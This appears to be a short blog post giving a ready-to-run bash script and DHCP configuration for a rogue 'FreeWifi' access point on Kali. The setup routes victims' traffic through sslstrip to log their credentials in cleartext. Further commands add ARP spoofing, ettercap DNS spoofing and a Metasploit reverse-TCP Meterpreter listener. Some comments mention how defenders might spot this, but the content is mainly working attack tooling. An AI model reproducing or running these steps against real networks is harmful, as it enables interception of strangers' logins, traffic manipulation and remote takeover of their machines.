15.07.2015

FakeAp [Kali + Alfa]

SCRIPT:

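#!/bin/bash
#
# airstrip.sh - bring up ("start") or tear down ("stop") a software access
# point with DHCP, NAT and an sslstrip HTTP proxy, on a Kali host with an
# rtl8187 (Alfa) wireless adapter.
#
# Usage: ./airstrip.sh stop|start
#
# Every command below changes system-wide state (kernel modules, firewall,
# routing, daemons), so the script has to run as root.
# Interface names, ESSID, channel and addresses are hard-coded; the
# 10.0.0.0/24 values must match the subnet declared in dhcpd.conf.

case "$1" in
  stop)
    echo "Killing Airbase-ng..."
    pkill airbase-ng
    sleep 3

    echo "Killing DHCP..."
    pkill dhcpd
    sleep 3

    # NOTE: these four commands wipe every rule and user-defined chain in the
    # filter and nat tables, not only the rules added by "start". Any firewall
    # policy the host had before is gone afterwards and must be restored
    # separately. The FORWARD policy that "start" sets to ACCEPT is not reset.
    echo "Flushing iptables"
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain

    # sslstrip runs under the Python interpreter. Match on the command line
    # instead of "killall python", which would terminate every Python process
    # on the host, related or not.
    echo "killing sslstrip the hard way"
    pkill -f sslstrip
    echo "killing sslstrip pid"
    killall sslstrip

    echo "killing DHCP server"
    killall dhcpd3

    echo "disabling IP Forwarding"
    echo "0" > /proc/sys/net/ipv4/ip_forward

    # Reload the adapter driver and toggle rfkill so the card comes back in a
    # clean state. "rfkill block all" briefly disables every radio on the host.
    echo "removing alfa and bringing it back - vmware only"
    rmmod rtl8187
    rfkill block all
    rfkill unblock all
    modprobe rtl8187
    sleep 5
    rfkill unblock all

    echo "bringing up wlan0"
    ifconfig wlan0 up
    ;;

  start)
    echo "Putting card in monitor mode"
    airmon-ng start wlan0 # Change to your wlan interface
    sleep 5

    # The ESSID and channel are what nearby clients and any wireless IDS see:
    # a BSSID that is not in the site inventory advertising this network name.
    echo "Starting Fake AP..."
    airbase-ng -e FreeWifi -c 11 wlan0mon & # Change essid, channel and interface
    sleep 5

    # at0 is the tap interface that carries the traffic of associated clients.
    # Its address is the gateway that dhcpd.conf hands out ("option routers").
    echo "configuring interface at0 according to dhcpd3 config"
    ifconfig at0 up
    ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpd.conf
    echo "adding a route"
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
    sleep 5

    # FORWARD is opened for all traffic and client traffic is source-NATed
    # out of the uplink interface.
    echo "configuring iptables"
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Change eth0 to your internet facing interface

    # Only tcp/80 is redirected to local port 10000 (sslstrip's default listen
    # port); tcp/443 is forwarded untouched. A browser that enforces HSTS for
    # a site does not send plain HTTP to it, so that traffic never reaches
    # this redirect.
    echo "setting up sslstrip interception"
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    # -a logs all HTTP and SSL traffic, -w names the log file. The log holds
    # whatever clients submit in clear text, so treat the file as sensitive.
    # The directory /root/fakewifi must already exist.
    sslstrip -a -w /root/fakewifi/sslstrip.out &
    sleep 2

    #echo "start ferret"
    #ferret -i at0
    #sleep 3;
    #echo "start hamster"
    #hamster
    #sleep 3;

    # Presumably a leftover from the commented-out ferret/hamster steps above;
    # every path used below is absolute.
    cd ~

    # Truncate the lease database so no leases from an earlier run remain.
    echo "clearing lease table"
    : > '/var/lib/dhcp/dhcpd.leases'

    # -f replaces a link left behind by a previous run; plain "ln -s" fails
    # when /var/run/dhcpd.pid already exists.
    # NOTE(review): the paths mix the dhcp3 and dhcp directory layouts - verify
    # them against the installed DHCP server package.
    echo "starting new DHCPD server"
    ln -sf /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
    dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
    sleep 5

    # Routing between at0 and the uplink is switched on last, after DHCP, NAT
    # and the proxy are in place.
    echo "enabling IP Forwarding...ENJOY the SHOW"
    echo "1" > /proc/sys/net/ipv4/ip_forward
    ;;

  *)
    echo "usage: ./airstrip.sh stop|start"
    ;;
esac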

DHCP:
# cat /etc/dhcp3/dhcpd.conf

# Lease lifetimes in seconds: 10 minutes by default, 2 hours at most.
default-lease-time 600;
max-lease-time 7200;

# This server declares itself the authoritative DHCP server for the subnet
# below.
authoritative;

# DHCP server messages go to syslog facility local7.
log-facility local7;

# Client network served on at0. The router address 10.0.0.254 is the address
# the script assigns to at0, so all client traffic is routed through this host.
# Clients are told to resolve names via 8.8.8.8, reached through the host's NAT.
# The pool 10.0.0.1-10.0.0.140 allows up to 140 simultaneous leases.
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}

///
# Separate, manually entered commands; none of them is called by the script.
# NOTE(review): the 192.168.2.x addresses used here are outside the
# 10.0.0.0/24 subnet that dhcpd.conf serves on at0 - presumably taken from a
# different lab network; confirm.

# Edits the name-to-address table read by ettercap's dns_spoof plugin.
nano /usr/share/ettercap/etter.dns
# Sends forged ARP replies on at0 for the address 192.168.2.129. On the
# defending side this shows up as the MAC address for that IP changing in
# ARP tables (arpwatch-style monitoring flags it).
arpspoof -i at0 192.168.2.129
# Text mode (-T), quiet (-q), on at0, with the dns_spoof plugin and ARP-based
# interception; "// //" selects all hosts. Clients then receive DNS answers
# that differ from what their configured resolver would return.
ettercap -T -q -i at0 -P dns_spoof -M arp // //
# The remaining lines are typed inside the Metasploit console, not the shell.
# They start a listener for a reverse-TCP Meterpreter session on
# 192.168.2.131:4444; outbound connections to that port are a common egress
# alerting candidate.
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.131
set LPORT 4444
exploit